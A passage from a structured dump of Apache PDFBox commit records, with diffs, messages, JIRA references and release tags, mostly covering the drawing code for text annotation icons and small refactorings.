contentStream.setLineCapStyle(0);", - "+ contentStream.setLineWidth(0.59f); // value from Adobe", - "+", - "+ // Adobe first fills a white circle with CA ca 0.6, so do we", - "+ contentStream.saveGraphicsState();", - "+ contentStream.setLineWidth(1);", - "+ PDExtendedGraphicsState gs = new PDExtendedGraphicsState();", - "+ gs.setAlphaSourceFlag(false);", - "+ gs.setStrokingAlphaConstant(0.6f);", - "+ gs.setNonStrokingAlphaConstant(0.6f);", - "+ gs.setBlendMode(BlendMode.NORMAL);", - "+ contentStream.setGraphicsStateParameters(gs);", - "+ contentStream.setNonStrokingColor(1f);", - "+ drawCircle2(contentStream, min / 2, min / 2, min / 2 - 1);", - "+ contentStream.fill();", - "+ contentStream.restoreGraphicsState();", - "+", - "+ contentStream.saveGraphicsState();", - "+ // rescale so that the glyph fits into circle and move it to circle center", - "+ // values gathered by trial and error", - "+ contentStream.transform(Matrix.getScaleInstance(0.001f * min / 1.3f, 0.001f * min / 1.3f));", - "+ contentStream.transform(Matrix.getTranslateInstance(200, 300));", - "+", - "+ // we get the shape of a Zapf Dingbats right arrow and use that one.", - "+ // Adobe uses a different font (which one?), or created the shape from scratch.", - "+ GeneralPath path = PDType1Font.ZAPF_DINGBATS.getPath(\"a160\");", - "+ addPath(contentStream, path);", - "+ contentStream.restoreGraphicsState();", - "+ // surprisingly, this one not counterclockwise.", - "+ drawCircle(contentStream, min / 2, min / 2, min / 2 - 1);", - "+ contentStream.fillAndStroke();", - "+ }", - "+", - "+", - " private void addPath(final PDAppearanceContentStream contentStream, GeneralPath path) throws IOException" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationText.java", - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-3353": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-3353", - "relevance": 2 - } - ] - }, - { - "commit_id": "cbae566275035cc60a14324d465a633e5262433f", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1532366099, - "hunks": 1, - "message": "PDFBOX-4071: use latest plugin version git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1836508 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/parent/pom.xml b/parent/pom.xml", - "index 134f56ba2..9541dd891 100644", - "--- a/parent/pom.xml", - "+++ b/parent/pom.xml", - "@@ -276,3 +276,3 @@", - " maven-bundle-plugin", - "- 3.5.0", - "+ 3.5.1", - " " - ], - "changed_files": [ - "parent/pom.xml" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4071": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4071", - "relevance": 2 - } - ] - }, - { - "commit_id": "cfe35b1f6a0ce755cf5933818cdf0b0e37f7a86d", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1530116504, - "hunks": 4, - "message": "PDFBOX-3353: support /UpArrow and /UpLeftArrow git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1834518 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", - "index 8d58eff54..6cc503e4a 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", - "@@ -60,2 +60,4 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", - " SUPPORTED_NAMES.add(PDAnnotationText.NAME_CROSS_HAIRS);", - "+ SUPPORTED_NAMES.add(PDAnnotationText.NAME_UP_ARROW);", - "+ SUPPORTED_NAMES.add(PDAnnotationText.NAME_UP_LEFT_ARROW);", - " }", - "@@ -83,3 +85,3 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", - " // BBox values:", - "- // key 18 18", - "+ // Key 13 18", - " // Comment 18 18", - "@@ -142,2 +144,8 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", - " break;", - "+ case PDAnnotationText.NAME_UP_ARROW:", - "+ drawUpArrow(annotation, contentStream);", - "+ break;", - "+ case PDAnnotationText.NAME_UP_LEFT_ARROW:", - "+ drawUpLeftArrow(annotation, contentStream);", - "+ break;", - " default:", - "@@ -494,2 +502,44 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", - "+ private void drawUpArrow(PDAnnotationText annotation, final PDAppearanceContentStream contentStream)", - "+ throws IOException", - "+ {", - "+ adjustRectAndBBox(annotation, 17, 20);", - "+", - "+ contentStream.setMiterLimit(4);", - "+ contentStream.setLineJoinStyle(1);", - "+ contentStream.setLineCapStyle(0);", - "+ contentStream.setLineWidth(0.59f); // value from Adobe", - "+", - "+ contentStream.moveTo(1, 7);", - "+ contentStream.lineTo(5, 7);", - "+ contentStream.lineTo(5, 1);", - "+ contentStream.lineTo(12, 1);", - "+ contentStream.lineTo(12, 7);", - "+ contentStream.lineTo(16, 7);", - "+ contentStream.lineTo(8.5f, 19);", - "+ contentStream.closeAndFillAndStroke();", - "+ }", - "+", - "+ private void drawUpLeftArrow(PDAnnotationText annotation, final PDAppearanceContentStream contentStream)", - "+ throws IOException", - "+ {", - "+ adjustRectAndBBox(annotation, 17, 17);", - "+", - "+ contentStream.setMiterLimit(4);", - "+ contentStream.setLineJoinStyle(1);", - "+ contentStream.setLineCapStyle(0);", - "+ contentStream.setLineWidth(0.59f); // value from Adobe", - "+ ", - "+ contentStream.transform(Matrix.getRotateInstance(Math.toRadians(45), 8, -4));", - "+", - "+ contentStream.moveTo(1, 7);", - "+ contentStream.lineTo(5, 7);", - "+ contentStream.lineTo(5, 1);", - "+ contentStream.lineTo(12, 1);", - "+ contentStream.lineTo(12, 7);", - "+ contentStream.lineTo(16, 7);", - "+ contentStream.lineTo(8.5f, 19);", - "+ contentStream.closeAndFillAndStroke();", - "+ }", - "+ ", - " private void drawRightArrow(PDAnnotationText annotation, final PDAppearanceContentStream contentStream)" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-3353": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-3353", - "relevance": 2 - } - ] - }, - { - "commit_id": "d5d125124360820c6ef799320b8457fb4537d182", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1529610393, - "hunks": 2, - "message": "PDFBOX-3353: HELVETICA_BOLD looks better git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1834049 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", - "index c4776034d..6211ffe18 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", - "@@ -301,5 +301,5 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", - "- // we get the shape of an Helvetica \"?\" and use that one.", - "+ // we get the shape of an Helvetica bold \"?\" and use that one.", - " // Adobe uses a different font (which one?), or created the shape from scratch.", - "- GeneralPath path = PDType1Font.HELVETICA.getPath(\"question\");", - "+ GeneralPath path = PDType1Font.HELVETICA_BOLD.getPath(\"question\");", - " addPath(contentStream, path);" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-3353": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-3353", - "relevance": 2 - } - ] - }, - { - "commit_id": "630de0b0eac6d6ca9d457f41c9b80ecb967708a9", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1529735154, - "hunks": 3, - "message": "PDFBOX-3353: correct comments, add some thought for future refactoring git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1834180 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", - "index a510d19b1..2e5708ed6 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", - "@@ -425,2 +425,4 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", - " //TODO this is mostly identical to drawStar, except for scale, translation and symbol", - "+ // maybe use a table with all values and draw from there", - "+ // this could also optionally use outer circle", - " private void drawCheck(PDAnnotationText annotation, final PDAppearanceContentStream contentStream)", - "@@ -485,3 +487,3 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", - "- // we get the shape of a Zapf Dingbats right pointer (0x27A4) and use that one.", - "+ // we get the shape of a Symbol crosshair (0x2295) and use that one.", - " // Adobe uses a different font (which one?), or created the shape from scratch.", - "@@ -524,3 +526,3 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", - "- // we get the shape of a Zapf Dingbats right arrow and use that one.", - "+ // we get the shape of a Zapf Dingbats right arrow (0x2794) and use that one.", - " // Adobe uses a different font (which one?), or created the shape from scratch." - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-3353": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-3353", - "relevance": 2 - } - ] - }, - { - "commit_id": "c9f4ee13fb90cfad12c5a32e74f90285985db84f", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1528392434, - "hunks": 4, - "message": "PDFBOX-3353: create handler for text annotation and support Note git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1833130 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationText.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationText.java", - "index 415f6ef73..9576df314 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationText.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationText.java", - "@@ -20,2 +20,4 @@ import org.apache.pdfbox.cos.COSDictionary;", - " import org.apache.pdfbox.cos.COSName;", - "+import org.apache.pdfbox.pdmodel.interactive.annotation.handlers.PDAppearanceHandler;", - "+import org.apache.pdfbox.pdmodel.interactive.annotation.handlers.PDTextAppearanceHandler;", - "@@ -28,2 +30,3 @@ public class PDAnnotationText extends PDAnnotationMarkup", - " {", - "+ private PDAppearanceHandler customAppearanceHandler;", - "@@ -173,2 +176,25 @@ public class PDAnnotationText extends PDAnnotationMarkup", - "+ /**", - "+ * Set a custom appearance handler for generating the annotations appearance streams.", - "+ * ", - "+ * @param appearanceHandler", - "+ */", - "+ public void setCustomAppearanceHandler(PDAppearanceHandler appearanceHandler)", - "+ {", - "+ customAppearanceHandler = appearanceHandler;", - "+ }", - "+", - "+ @Override", - "+ public void constructAppearances()", - "+ {", - "+ if (customAppearanceHandler == null)", - "+ {", - "+ PDTextAppearanceHandler appearanceHandler = new PDTextAppearanceHandler(this);", - "+ appearanceHandler.generateAppearanceStreams();", - "+ }", - "+ else", - "+ {", - "+ customAppearanceHandler.generateAppearanceStreams();", - "+ }", - "+ }", - " }", - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", - "new file mode 100644", - "index 000000000..b76e2e372", - "--- /dev/null", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", - "@@ -0,0 +1,115 @@", - "+/*", - "+ * Copyright 2018 The Apache Software Foundation.", - "+ *", - "+ * Licensed under the Apache License, Version 2.0 (the \"License\");", - "+ * you may not use this file except in compliance with the License.", - "+ * You may obtain a copy of the License at", - "+ *", - "+ * http://www.apache.org/licenses/LICENSE-2.0", - "+ *", - "+ * Unless required by applicable law or agreed to in writing, software", - "+ * distributed under the License is distributed on an \"AS IS\" BASIS,", - "+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", - "+ * See the License for the specific language governing permissions and", - "+ * limitations under the License.", - "+ */", - "+package org.apache.pdfbox.pdmodel.interactive.annotation.handlers;", - "+", - "+import java.io.IOException;", - "+import org.apache.commons.logging.Log;", - "+import org.apache.commons.logging.LogFactory;", - "+import org.apache.pdfbox.pdmodel.PDAppearanceContentStream;", - "+import org.apache.pdfbox.pdmodel.common.PDRectangle;", - "+import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotation;", - "+import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotationText;", - "+import org.apache.pdfbox.pdmodel.interactive.annotation.PDAppearanceStream;", - "+", - "+/**", - "+ *", - "+ * @author Tilman Hausherr", - "+ */", - "+public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", - "+{", - "+ private static final Log LOG = LogFactory.getLog(PDTextAppearanceHandler.class);", - "+", - "+ public PDTextAppearanceHandler(PDAnnotation annotation)", - "+ {", - "+ super(annotation);", - "+ }", - "+", - "+ @Override", - "+ public void generateAppearanceStreams()", - "+ {", - "+ generateNormalAppearance();", - "+ generateRolloverAppearance();", - "+ generateDownAppearance();", - "+ }", - "+", - "+ @Override", - "+ public void generateNormalAppearance()", - "+ {", - "+ PDAnnotationText annotation = (PDAnnotationText) getAnnotation();", - "+ if (!PDAnnotationText.NAME_NOTE.equals(annotation.getName()))", - "+ {", - "+ //TODO Comment, Key, Help, NewParagraph, Paragraph, Insert", - "+ return;", - "+ }", - "+", - "+ try (PDAppearanceContentStream contentStream = getNormalAppearanceAsContentStream())", - "+ {", - "+ boolean hasBackground = contentStream.setNonStrokingColorOnDemand(getColor());", - "+ setOpacity(contentStream, annotation.getConstantOpacity());", - "+ ", - "+ //TODO find out what Adobe chooses if color is missing", - "+", - "+ PDRectangle rect = getRectangle();", - "+ PDAppearanceStream appearanceStream = annotation.getNormalAppearanceStream();", - "+ PDRectangle bbox = rect.createRetranslatedRectangle();", - "+ appearanceStream.setBBox(bbox);", - "+", - "+ switch (annotation.getName())", - "+ {", - "+ case PDAnnotationText.NAME_NOTE:", - "+ drawNote(contentStream, bbox, hasBackground);", - "+ break;", - "+", - "+ default:", - "+ break;", - "+ }", - "+", - "+ }", - "+ catch (IOException e)", - "+ {", - "+ LOG.error(e);", - "+ }", - "+", - "+ }", - "+", - "+ private void drawNote(final PDAppearanceContentStream contentStream, PDRectangle bbox, boolean hasBackground)", - "+ throws IOException", - "+ {", - "+ contentStream.setLineJoinStyle(1); // round edge", - "+ contentStream.addRect(1, 1, bbox.getWidth() - 2, bbox.getHeight() - 2);", - "+ contentStream.moveTo(bbox.getWidth() / 4, bbox.getHeight() / 7 * 2);", - "+ contentStream.lineTo(bbox.getWidth() * 3 / 4 - 1, bbox.getHeight() / 7 * 2);", - "+ contentStream.moveTo(bbox.getWidth() / 4, bbox.getHeight() / 7 * 3);", - "+ contentStream.lineTo(bbox.getWidth() * 3 / 4 - 1, bbox.getHeight() / 7 * 3);", - "+ contentStream.moveTo(bbox.getWidth() / 4, bbox.getHeight() / 7 * 4);", - "+ contentStream.lineTo(bbox.getWidth() * 3 / 4 - 1, bbox.getHeight() / 7 * 4);", - "+ contentStream.moveTo(bbox.getWidth() / 4, bbox.getHeight() / 7 * 5);", - "+ contentStream.lineTo(bbox.getWidth() * 3 / 4 - 1, bbox.getHeight() / 7 * 5);", - "+ contentStream.drawShape(1, true, hasBackground);", - "+ }", - "+", - "+ @Override", - "+ public void generateRolloverAppearance()", - "+ {", - "+ // No rollover appearance generated", - "+ }", - "+", - "+ @Override", - "+ public void generateDownAppearance()", - "+ {", - "+ // No down appearance generated", - "+ }", - "+}" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationText.java", - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-3353": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-3353", - "relevance": 2 - } - ] - }, - { - "commit_id": "1d34c55e23ce459d4cda435c16b49e24f5df0c6c", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1528481842, - "hunks": 5, - "message": "PDFBOX-3353: rename methods in line with existing ones git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1833199 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDAbstractAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDAbstractAppearanceHandler.java", - "index 7f80bdcdf..1300770d9 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDAbstractAppearanceHandler.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDAbstractAppearanceHandler.java", - "@@ -290,3 +290,3 @@ public abstract class PDAbstractAppearanceHandler implements PDAppearanceHandler", - " case PDAnnotationLine.LE_CIRCLE:", - "- addCircle(cs, x, y, width * 3);", - "+ drawCircle(cs, x, y, width * 3);", - " break;", - "@@ -376,3 +376,3 @@ public abstract class PDAbstractAppearanceHandler implements PDAppearanceHandler", - " */", - "- void addCircle(PDAppearanceContentStream cs, float x, float y, float r) throws IOException", - "+ void drawCircle(PDAppearanceContentStream cs, float x, float y, float r) throws IOException", - " {", - "@@ -399,3 +399,3 @@ public abstract class PDAbstractAppearanceHandler implements PDAppearanceHandler", - " */", - "- void addCircle2(PDAppearanceContentStream cs, float x, float y, float r) throws IOException", - "+ void drawCircle2(PDAppearanceContentStream cs, float x, float y, float r) throws IOException", - " {", - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", - "index 9f6772fab..5e0241496 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", - "@@ -148,3 +148,3 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", - " contentStream.setNonStrokingColor(1f);", - "- addCircle(contentStream, bbox.getWidth() / 2, bbox.getHeight() / 2, smallR);", - "+ drawCircle(contentStream, bbox.getWidth() / 2, bbox.getHeight() / 2, smallR);", - " contentStream.fill();", - "@@ -153,4 +153,4 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", - " contentStream.setLineWidth(0.59f); // value from Adobe", - "- addCircle(contentStream, bbox.getWidth() / 2, bbox.getHeight() / 2, smallR);", - "- addCircle2(contentStream, bbox.getWidth() / 2, bbox.getHeight() / 2, largeR);", - "+ drawCircle(contentStream, bbox.getWidth() / 2, bbox.getHeight() / 2, smallR);", - "+ drawCircle2(contentStream, bbox.getWidth() / 2, bbox.getHeight() / 2, largeR);", - " contentStream.fillAndStroke();" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDAbstractAppearanceHandler.java", - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-3353": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-3353", - "relevance": 2 - } - ] - }, - { - "commit_id": "6ed7ca7336fa8776d35347f0d4c242f0a756f048", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1528548071, - "hunks": 2, - "message": "PDFBOX-4071: java coding convention, first static class variables, then constructor, then methods git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1833232 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/blend/BlendMode.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/blend/BlendMode.java", - "index 338ff8fcf..620bb669a 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/blend/BlendMode.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/blend/BlendMode.java", - "@@ -32,46 +32,2 @@ public abstract class BlendMode", - " {", - "- /**", - "- * Determines the blend mode from the BM entry in the COS ExtGState.", - "- *", - "- * @param cosBlendMode name or array", - "- * @return blending mode", - "- */", - "- public static BlendMode getInstance(COSBase cosBlendMode)", - "- {", - "- BlendMode result = null;", - "- if (cosBlendMode instanceof COSName)", - "- {", - "- result = BLEND_MODES.get(cosBlendMode);", - "- }", - "- else if (cosBlendMode instanceof COSArray)", - "- {", - "- COSArray cosBlendModeArray = (COSArray) cosBlendMode;", - "- for (int i = 0; i < cosBlendModeArray.size(); i++)", - "- {", - "- result = BLEND_MODES.get(cosBlendModeArray.getObject(i));", - "- if (result != null)", - "- {", - "- break;", - "- }", - "- }", - "- }", - "-", - "- if (result != null)", - "- {", - "- return result;", - "- }", - "- return BlendMode.NORMAL;", - "- }", - "- ", - "- /**", - "- * Determines the blend mode name from the BM object.", - "- *", - "- * @param bm Blend mode.", - "- * @return name of blend mode.", - "- */", - "- public static COSName getCOSName(BlendMode bm)", - "- {", - "- return BLEND_MODE_NAMES.get(bm);", - "- }", - "-", - " public static final SeparableBlendMode NORMAL = new SeparableBlendMode()", - "@@ -257,2 +213,46 @@ public abstract class BlendMode", - "+ /**", - "+ * Determines the blend mode from the BM entry in the COS ExtGState.", - "+ *", - "+ * @param cosBlendMode name or array", - "+ * @return blending mode", - "+ */", - "+ public static BlendMode getInstance(COSBase cosBlendMode)", - "+ {", - "+ BlendMode result = null;", - "+ if (cosBlendMode instanceof COSName)", - "+ {", - "+ result = BLEND_MODES.get(cosBlendMode);", - "+ }", - "+ else if (cosBlendMode instanceof COSArray)", - "+ {", - "+ COSArray cosBlendModeArray = (COSArray) cosBlendMode;", - "+ for (int i = 0; i < cosBlendModeArray.size(); i++)", - "+ {", - "+ result = BLEND_MODES.get(cosBlendModeArray.getObject(i));", - "+ if (result != null)", - "+ {", - "+ break;", - "+ }", - "+ }", - "+ }", - "+", - "+ if (result != null)", - "+ {", - "+ return result;", - "+ }", - "+ return BlendMode.NORMAL;", - "+ }", - "+ ", - "+ /**", - "+ * Determines the blend mode name from the BM object.", - "+ *", - "+ * @param bm Blend mode.", - "+ * @return name of blend mode.", - "+ */", - "+ public static COSName getCOSName(BlendMode bm)", - "+ {", - "+ return BLEND_MODE_NAMES.get(bm);", - "+ }", - "+", - " private static int get255Value(float val)" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/blend/BlendMode.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4071": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4071", - "relevance": 2 - } - ] - }, - { - "commit_id": "8ea8645ae8b878c9ae77c0b0a21f1091f8801573", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1528135573, - "hunks": 2, - "message": "PDFBOX-3353: some styles do not rotate with the line, e.g. square and diamond, so add a set constant for angled styles that do rotate, e.g. arrows git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1832874 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDAbstractAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDAbstractAppearanceHandler.java", - "index 6b65aa2f6..83a00d9cb 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDAbstractAppearanceHandler.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDAbstractAppearanceHandler.java", - "@@ -60,2 +60,7 @@ public abstract class PDAbstractAppearanceHandler implements PDAppearanceHandler", - " protected static final Set INTERIOR_COLOR_STYLES = createInteriorColorStyles();", - "+ ", - "+ /**", - "+ * Line ending styles where the shape changes its angle, e.g. arrows.", - "+ */", - "+ protected static final Set ANGLED_STYLES = createAngledStyles();", - "@@ -405,2 +410,14 @@ public abstract class PDAbstractAppearanceHandler implements PDAppearanceHandler", - "+ private static Set createAngledStyles()", - "+ {", - "+ Set angledStyles = new HashSet<>();", - "+ angledStyles.add(PDAnnotationLine.LE_CLOSED_ARROW);", - "+ angledStyles.add(PDAnnotationLine.LE_OPEN_ARROW);", - "+ angledStyles.add(PDAnnotationLine.LE_R_CLOSED_ARROW);", - "+ angledStyles.add(PDAnnotationLine.LE_R_OPEN_ARROW);", - "+ angledStyles.add(PDAnnotationLine.LE_BUTT);", - "+ angledStyles.add(PDAnnotationLine.LE_SLASH);", - "+ return Collections.unmodifiableSet(angledStyles);", - "+ }", - "+", - " /**" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDAbstractAppearanceHandler.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-3353": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-3353", - "relevance": 2 - } - ] - }, - { - "commit_id": "279711b14279243bbe585976816f3a300d9f6417", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1531171390, - "hunks": 1, - "message": "PDFBOX-4071: remove unneeded code, expression is never null git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/1.8@1835499 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/examples/src/main/java/org/apache/pdfbox/examples/signature/CreateSignature.java b/examples/src/main/java/org/apache/pdfbox/examples/signature/CreateSignature.java", - "index d08a469ff..1ff32c985 100644", - "--- 